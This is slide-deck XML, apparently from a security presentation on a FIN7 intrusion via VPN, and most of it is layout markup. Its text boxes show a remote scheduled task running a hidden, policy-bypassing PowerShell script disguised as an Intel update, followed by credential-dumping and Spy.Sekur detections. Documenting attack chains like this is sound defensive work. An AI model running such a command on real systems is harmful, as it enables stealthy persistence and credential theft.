            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7003932-D116-6E64-0245-C130BBCEB7B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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="!!Gradient TEAL 2" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AB76EFA-9921-B8FA-93FB-35A157D7EF2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220222" y="-16963399"/>
            <a:ext cx="42906647" cy="26403406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6652DE47-9068-37E3-4842-7A5DEAF4F8A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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3724305-D360-9662-5F1F-A06A1A0DD24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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A20F6EC-E66D-2C45-8DDD-4F629071A922}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914401" y="892285"/>
            <a:ext cx="3214956" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>VPN – FIN7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4754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EAD5934-13A6-FF2E-731D-D71330C888CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1183085" y="3591950"/>
            <a:ext cx="5768532" cy="5301679"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3195"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="tx1"/>
                </a:gs>
                <a:gs pos="32000">
                  <a:schemeClr val="accent1"/>
                </a:gs>
                <a:gs pos="75000">
                  <a:schemeClr val="accent1"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx2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7802626-9548-B834-ECF3-7A67751AF2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0410" y="3837554"/>
            <a:ext cx="5781210" cy="23992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7F7752-C199-BBC9-79A3-EBAFD68133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3205" y="6730830"/>
            <a:ext cx="2976151" cy="198644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2883730-A226-B761-9B86-1009CB2E4034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1925609" y="3795828"/>
            <a:ext cx="3346803" cy="31055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25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AE34B16-F55B-CD8F-4882-A747C28C2EC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1871041" y="8216927"/>
            <a:ext cx="2167462" cy="31055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25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2E75EE4-1D2D-714E-FCE6-328D5B42391B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1162219" y="3567902"/>
            <a:ext cx="0" cy="5737106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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4476A2D0-6D9D-8871-29B5-161186E489E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1183082" y="2928257"/>
            <a:ext cx="5091482" cy="692566"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="135860" tIns="67930" rIns="135860" bIns="67930" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="60963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33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05758">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="28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Update.ps1 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="280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PowerTrash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="280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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Connector: Elbow 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19CC6842-55B6-B6C4-AE47-8F36B07D54B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="45" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7832673" y="4019723"/>
            <a:ext cx="685994" cy="352314"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Connector: Elbow 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4634DEFF-2DC4-95D0-70CF-BB9E82E6EC6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="49" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7859166" y="4675029"/>
            <a:ext cx="1103026" cy="817322"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="!!Connector: Elbow 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F83DF4F-2D4A-B631-B91E-07A98012E806}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="8881656" y="6128930"/>
            <a:ext cx="796729" cy="449167"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100118"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Connector: Elbow 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0DDD4C-0CC2-D71F-D2ED-AA975E3662F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="62" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="8726146" y="7069224"/>
            <a:ext cx="1115384" cy="452942"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr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8B5F410-5302-D41A-4298-F3FCDC24C865}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7793019" y="2996937"/>
            <a:ext cx="4317809" cy="855946"/>
            <a:chOff x="12435194" y="912131"/>
            <a:chExt cx="4317809" cy="855946"/>
          </a:xfrm>
        </p:grpSpPr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D6E0CB51-6440-E5D0-E893-89FADE21179A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12435194" y="914400"/>
              <a:ext cx="4317809" cy="853677"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="414D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450B122D-D8CB-17B2-021C-1315230F4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12505042" y="912131"/>
              <a:ext cx="836659" cy="836659"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{822A3C24-A099-EEDD-9947-A7EF4FD4D531}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13341701" y="914400"/>
              <a:ext cx="3411302" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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Remote Scheduled Task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FC7D159-0C43-8FB8-56D5-ECB45A7CFA52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8351827" y="4112038"/>
            <a:ext cx="6330249" cy="853677"/>
            <a:chOff x="12435194" y="914400"/>
            <a:chExt cx="6330249" cy="853677"/>
          </a:xfrm>
        </p:grpSpPr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64420B41-49C7-56D4-2AB4-097B3D850F69}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12435194" y="914400"/>
              <a:ext cx="6330249" cy="853677"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="424D5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675EA41A-C028-A393-521B-362476575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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12617637" y="1160488"/>
              <a:ext cx="592244" cy="361499"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD02B169-21E7-4669-CFFE-B07BD52C87FE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13341701" y="914400"/>
              <a:ext cx="5423742" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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cmd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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/c </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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powershell</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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-w h -ep bypass -f C:\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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Programdata</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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\intel\update.ps1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332D3B9-EE54-28CB-35CC-B0642E93A8B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8819340" y="5208364"/>
            <a:ext cx="6330249" cy="853677"/>
            <a:chOff x="12435194" y="914400"/>
            <a:chExt cx="6330249" cy="853677"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr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FA2E179C-0B8A-7DA4-B485-266FEEBE9FBD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12435194" y="914400"/>
              <a:ext cx="6330249" cy="853677"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4274CC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04981A44-22D9-423A-67D2-308BAF9E8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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12639457" y="1099964"/>
              <a:ext cx="608996" cy="456747"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFD330D2-AE45-5640-FB3F-BA26759E3D93}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13341701" y="914400"/>
              <a:ext cx="5423742" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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powershell</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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-w h -ep bypass -f C:\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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Programdata</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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\intel\update.ps1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0038478-A29F-D86B-D9B4-6518EE6135CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9510309" y="6302415"/>
            <a:ext cx="7872833" cy="853677"/>
            <a:chOff x="10921200" y="5325220"/>
            <a:chExt cx="7872833" cy="853677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160C7565-360D-6A31-3EFE-C1960A996DE8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10921200" y="5325220"/>
              <a:ext cx="7872833" cy="853677"/>
              <a:chOff x="12435194" y="914400"/>
              <a:chExt cx="7872833" cy="853677"/>
            </a:xfrm>
            <a:effectLst/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="Rounded Rectangle 52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13EC5AD0-815C-26E0-AD69-77652A6E91D6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12435194" y="914400"/>
                <a:ext cx="7872833" cy="853677"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="0097A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K"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="55" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82E3C6D5-D0E5-0BE5-88DC-93A597903751}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13341700" y="914400"/>
                <a:ext cx="6966327" cy="834390"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1079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811382">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" kern="0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Potential credential dumping – Generic [F0436a]</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="57" name="Graphic 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D39BEB10-AFB8-D1DF-9F1E-C50D9827F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p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="11077712" y="5400704"/>
              <a:ext cx="703855" cy="703855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D49EAB58-1E7A-9533-F758-7DCF0982E188}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9510309" y="7426548"/>
            <a:ext cx="7872833" cy="853677"/>
            <a:chOff x="11179244" y="6339909"/>
            <a:chExt cx="7872833" cy="853677"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Rounded Rectangle 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25F45877-3FC5-3186-58A8-0CA45236892B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11179244" y="6339909"/>
              <a:ext cx="7872833" cy="853677"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EA860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63" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAAE0F8E-5DA8-04A5-7506-D94085D99C82}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12085750" y="6339909"/>
              <a:ext cx="6966327" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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Win64/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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Spy.Sekur.B</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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Blocked in Memory</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="65" name="Graphic 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D60017C5-DFA4-22BD-EA9A-CA144EE87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p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="11286671" y="6375282"/>
              <a:ext cx="805644" cy="805644"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom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F0EA269-1BD9-E15D-EB82-8B38ACF20361}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4110215" y="810657"/>
            <a:ext cx="726372" cy="838155"/>
            <a:chOff x="14027225" y="3493572"/>
            <a:chExt cx="1160569" cy="1339172"/>
          </a:xfrm>
        </p:grpSpPr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1C506ECC-75F0-B893-3C3F-F11D3E3BAA60}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14518214" y="3850697"/>
              <a:ext cx="178590" cy="178538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 178590 w 178590"/>
                <a:gd name="connsiteY0" fmla="*/ 89243 h 178538"/>
                <a:gd name="connsiteX1" fmla="*/ 89295 w 178590"/>
                <a:gd name="connsiteY1" fmla="*/ 178538 h 178538"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 178590"/>
                <a:gd name="connsiteY2" fmla="*/ 89243 h 178538"/>
                <a:gd name="connsiteX3" fmla="*/ 89295 w 178590"/>
                <a:gd name="connsiteY3" fmla="*/ 0 h 178538"/>
                <a:gd name="connsiteX4" fmla="*/ 178590 w 178590"/>
                <a:gd name="connsiteY4" fmla="*/ 89243 h 178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590" h="178538">
                  <a:moveTo>
                    <a:pt x="178590" y="89243"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="178590" y="138572"/>
                    <a:pt x="138624" y="178538"/>
                    <a:pt x="89295" y="178538"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39966" y="178538"/>
                    <a:pt x="0" y="138572"/>
                    <a:pt x="0" y="89243"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="39966"/>
                    <a:pt x="39966" y="0"/>
                    <a:pt x="89295" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138624" y="0"/>
                    <a:pt x="178590" y="39966"/>
                    <a:pt x="178590" y="89243"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="13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SK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99CE85AD-609B-4E4F-160A-9FEB886EE2AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14027225" y="3493572"/>
              <a:ext cx="1160569" cy="1339172"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY0" fmla="*/ 267885 h 1339172"/>
                <a:gd name="connsiteX1" fmla="*/ 401748 w 1160569"/>
                <a:gd name="connsiteY1" fmla="*/ 446422 h 1339172"/>
                <a:gd name="connsiteX2" fmla="*/ 535664 w 1160569"/>
                <a:gd name="connsiteY2" fmla="*/ 619147 h 1339172"/>
                <a:gd name="connsiteX3" fmla="*/ 535664 w 1160569"/>
                <a:gd name="connsiteY3" fmla="*/ 982032 h 1339172"/>
                <a:gd name="connsiteX4" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY4" fmla="*/ 1026653 h 1339172"/>
                <a:gd name="connsiteX5" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY5" fmla="*/ 1026653 h 1339172"/>
                <a:gd name="connsiteX6" fmla="*/ 758821 w 1160569"/>
                <a:gd name="connsiteY6" fmla="*/ 982032 h 1339172"/>
                <a:gd name="connsiteX7" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY7" fmla="*/ 937411 h 1339172"/>
                <a:gd name="connsiteX8" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY8" fmla="*/ 937411 h 1339172"/>
                <a:gd name="connsiteX9" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY9" fmla="*/ 848116 h 1339172"/>
                <a:gd name="connsiteX10" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY10" fmla="*/ 848116 h 1339172"/>
                <a:gd name="connsiteX11" fmla="*/ 758821 w 1160569"/>
                <a:gd name="connsiteY11" fmla="*/ 803495 h 1339172"/>
                <a:gd name="connsiteX12" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY12" fmla="*/ 758875 h 1339172"/>
                <a:gd name="connsiteX13" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY13" fmla="*/ 758875 h 1339172"/>
